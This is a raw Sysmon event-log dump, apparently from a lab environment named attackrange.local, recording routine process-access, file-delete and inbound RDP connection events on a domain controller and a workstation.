Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB89-607E-A50B-00000000BB01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB89-607E-A50B-00000000BB01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.330{A7A01FEF-EB89-607E-A50B-00000000BB01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000072647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\18ATSMREB9\Microsoft.CSharp.ni.dllMD5=B9E34CEC4D766AFE6195FCDD5C265721,SHA256=E1D7D03019EFE1A8247C17C2575F647A7FF7E0B6C9CB9996BA29EBB8F9A8C303,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18309F6A09DD14A05986DAD94B08E429,SHA256=D189C40E88160A7DD6FD8B86BAD5685AB80893D63079FDE58DF249FAB08F84F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\17N3ZVH06M\System.Transactions.ni.dll.auxMD5=999D14BCEA16BC6927359881D4D39D58,SHA256=E951F9BEEAFE791DF0F3CB3AFE9BD07BDE358EE20E01DC5F2018DDDB466EEC96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\17N3ZVH06M\System.Transactions.ni.dllMD5=069D6E12D3CAB923FD4E8AC75EE89BA1,SHA256=F4957C4BFCF882B16615546FCA8A910B09508E5520C62914203915BA51DC3DF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\16LD33LLVQ\System.Core.ni.dll.auxMD5=CCAD9FB37273BAEBE3F5FA188E00C517,SHA256=67F0D2F9036FA94E2C9FA5EFB2D3D041BBFBE59378A4D2A5BFA52E7821ADC2B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\16LD33LLVQ\System.Core.ni.dllMD5=6BE5BA854610D494C606FCE794962FB3,SHA256=95729D65C54D3EC524E4C11C51147EAB34F0F0523983715CD62D741CB94BE626,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\14J7AS46N3\System.Core.ni.dll.auxMD5=0D59346ED726744FEA0E19160BD691D5,SHA256=77169350D0B655C78CE5B6ACE4BA8B2542B952D2566D0EB2BFE7CA3AA919E965,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\14J7AS46N3\System.Core.ni.dllMD5=FC3DE6187226828D53AF86A55AEFE990,SHA256=41B7A76F0DD86CFFE6D0CA3DC832FC4BC49BBF1B91AD8522A80A686C78FA8CB0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049971Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:09.704{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30E7FF2A40D91EFE5C9994EDBD321C4B,SHA256=B2CDF88D0A69844D9D30546D3D917F9D4D5294EA7C9543012C20BCDDAB17DA6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049970Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:09.485{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75F1A367C581397D283E368DF99A3B2E,SHA256=EDD75BBC37E2ABFEA1F96DA96F26DB357C5398B0D3817222DD1A6F1088195B7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049969Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:06.891{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51083-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\2G2Y49NC2J\System.Configuration.Install.ni.dll.auxMD5=08DAC8470A6071A6F9D300CCECE11FDC,SHA256=F21F4F9BD5BEBE704971BBC058A01C007211FABC2BF86E2BDFF504394E89A5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\2G2Y49NC2J\System.Configuration.Install.ni.dllMD5=6CEF29BBBE3A64E8EDA58C8614B58316,SHA256=D6B4C973DAA83DB08F6D1013643F3A287BE92A3DF7629A06421EA2370B126C58,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\27Y7R3T92H\System.ni.dll.auxMD5=97D37AFB390992CE3C6F1D4E1112CAA5,SHA256=E9BE5584192A17CDF882242AB2C104E2A185B276E589F81AEC50663E4BA6F881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\27Y7R3T92H\System.ni.dllMD5=709A692740777021A1BC08A50B61C807,SHA256=AD85D06B3912A64986318D87202BDCAD748D6E68E3B693D37459EF9874889CCF,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.415{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-16484-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\22WTK6S38H\System.Web.ni.dll.auxMD5=FD01F2FC3BB9C77DE65D7FE41BB7E3FA,SHA256=176DC7D281B5059ACA290E90B90480786F1AC745C1953B30BF63E39B63FCDD3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\22WTK6S38H\System.Web.ni.dllMD5=70FDF94CA68090BFC787A336F54A1F7B,SHA256=5804590DDB304F2DE4AB2E9E48C281FBB1EE09CB9C711DCD5FCE424CBB970636,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\2250KRECTB\System.Drawing.ni.dll.auxMD5=DCEFC8B9CB7245B90F2A6AA4084A0F71,SHA256=3760AFB996B9C1860A13167C3DA5FD6B019EE185076145A71387745DC8DA24A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\2250KRECTB\System.Drawing.ni.dllMD5=E8956B039DFD94E1EDBD129DE56F3F2D,SHA256=1DAC647C4642EB0A13A5135BCAF254A30E477CD5DF6BD7DF978F2065CAF5BFE2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1XUIY9CJL0\System.Core.ni.dll.auxMD5=9D25DB6F29813D2D1FA827D77A12D1BD,SHA256=829105ADBF1A5F782DF9E98B29CD106AE1D27988D05B162A5702069C31282417,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1XUIY9CJL0\System.Core.ni.dllMD5=2FF381DDFCDD26492D228199E5348106,SHA256=381EBF60EC44E82FE34BAC17A1856C95E766E9260604747F71547133C1C550C2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.344{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81A3A256CEEFB94207F8402D51B86336,SHA256=5B5EEB3A4B2D63EECC9F6A949AAEBA746E6FB81F6FD50CD176A111002D842DC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1WN61CHW5A\System.Windows.Forms.ni.dll.auxMD5=F6C231606A7F2DD887BFA24437925F26,SHA256=9A5409CD669694C142B59861B4C92B3F90AFBD4046E46888C8EA80D99826B199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1WN61CHW5A\System.Windows.Forms.ni.dllMD5=431FC5E8180083E6FA1E00FF64B88ADE,SHA256=4FB1BA0C6AA024526594B04095FD9179A547D1C44053360A99CD463D11D3916D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049973Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:10.720{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79862CDE96C980A0002160C0736A04A5,SHA256=E7A4FDE7F3D098DEB92BA8FC10722E90D7E579FE706C84D3767E3216021DF1D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049972Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:08.064{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58427-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\45O1CVQW9C\System.Numerics.ni.dll.auxMD5=B112B901DBE457D5C44431DEF8018CE7,SHA256=E8A9B868DAAA55B69C61BE12D2C8D3EA8BB1F99EB970230BB6A867B65586B41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\45O1CVQW9C\System.Numerics.ni.dllMD5=3C15EEC6D52A4674FE204A7E3610D46E,SHA256=95EBC4E4BF44CE09D29EC4505D7B8548DA661278D4DF53F887CC357557F45A80,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\41MYLB0E6B\System.Management.ni.dll.auxMD5=FE20915E753A6B48C1D7C978C1AFF282,SHA256=D66CA48589CA1B1CCCDFDE70ECB6B57B258A0962DA308809DD46E0F4ABEC0D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\41MYLB0E6B\System.Management.ni.dllMD5=A2398F5CDEEC4226380CB620C5D180D8,SHA256=4007C9B8A5360D49CD4DA98D262DA539AD790AA13CA54712757441B1C56F2980,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3ZIZF1QT8S\System.Core.ni.dll.auxMD5=857C3C633078A0FF327EC1F905FAE10D,SHA256=31B50CA26261C58BCF0E35A0BFE7B4B13E7FD05F7DA3C20DFCA4E7C85C169ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3ZIZF1QT8S\System.Core.ni.dllMD5=45F542E6DDC2861FF2D6E1C16E05A4E1,SHA256=162BC0CC8560FAEC6AF395BE24D66124DF49F6FD8F21FA90A445BE4F34BC931B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3YC0J5TJBN\System.DirectoryServices.ni.dll.auxMD5=5BE283A9E68591B32773566F147A211F,SHA256=83CFFD1BAEA158353574578F2145C054F207526C8E544F114652C4EF01713BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3YC0J5TJBN\System.DirectoryServices.ni.dllMD5=8CE05080E8212D45575DB5EC52382363,SHA256=B2960982ADB25974561E8356470B1234CDEC00F5FDBAFDC39F221B37F914433E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3SN3JHS6KB\System.DirectoryServices.ni.dll.auxMD5=6E2FE7A4355DAE72B2A560B93997D344,SHA256=39C8A0903E4C7697FCA69012253AA0A79981CCC8C8C3C53C097A9C753233643D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3SN3JHS6KB\System.DirectoryServices.ni.dllMD5=CDCED7F4E698C3DE8142E81A1A46A9AB,SHA256=6DC7DB265A13AA4C6A8DFCA621CD76C374D0269564732D7FE0097A9404A0CDF7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3M6KGO24OM\System.Web.Extensions.ni.dll.auxMD5=EA373B89C0FD4F1EE90998C42C3A4FD2,SHA256=A88BEF9CF305003D6B1E713629F962CE4B81079FF4F665D6F8A59A5C8C2E565E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3M6KGO24OM\System.Web.Extensions.ni.dllMD5=08FAFE195EAA21633B7E1910E5E5685D,SHA256=3FA1D9C02A067D54B12F7BDC8333C0173B1BB42919BDFD9A76F189F57855FEBC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3CINU4ZU93\System.Web.Extensions.ni.dll.auxMD5=964C12F7EDE4473648291D5C6D52CA5B,SHA256=09CD7BFB8C8470190592716E3BF441DAF0C0EC6DF889077E122A1463BFCEDA1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\3CINU4ZU93\System.Web.Extensions.ni.dllMD5=5F68656D96F957624F2094DD871627C3,SHA256=263A84209803C9AF4C4317A5C5FB37BE22885FFC93EF4C906AAF0C627D8EC0FD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.469{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\35M7W2QEE8\System.Security.ni.dll.auxMD5=A8E16B0835C7BA8888173106EDFD7698,SHA256=7D44F7630D8C42C9BCBA5DB5C74B36391E11FC17D4FAF6D26C452C1BD3E359EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.469{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\35M7W2QEE8\System.Security.ni.dllMD5=B92BEE33B09857E5DB60DF34BED170CA,SHA256=C07B57EDCAACD9E9B6CA2340A8DAB75CCF3BE99EDDF063804E73FFB74CDE645D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\32RU3KCHH6\System.Core.ni.dll.auxMD5=1D9AC23D3A528EC83A241C675B3BD0BA,SHA256=2DB7B57944D8B43359DE41CBDA59DA1228B2D57A86AF3B323F402CA87F457F08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\32RU3KCHH6\System.Core.ni.dllMD5=E7D8816D0A6FA8D8748E1BAE0B4A6875,SHA256=A0D3EA7A34C4EAEF847DD511D3BFE0E783EEF75A63A6FEFCD03C2F6B9AAE4F68,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.360{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B934E3DB849AC8B81B14CEE91BE47B5,SHA256=BB93B4B397984A3558C941738FA00BE9B34C8DE1A30B8480CCFB3FC692B46131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.282{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 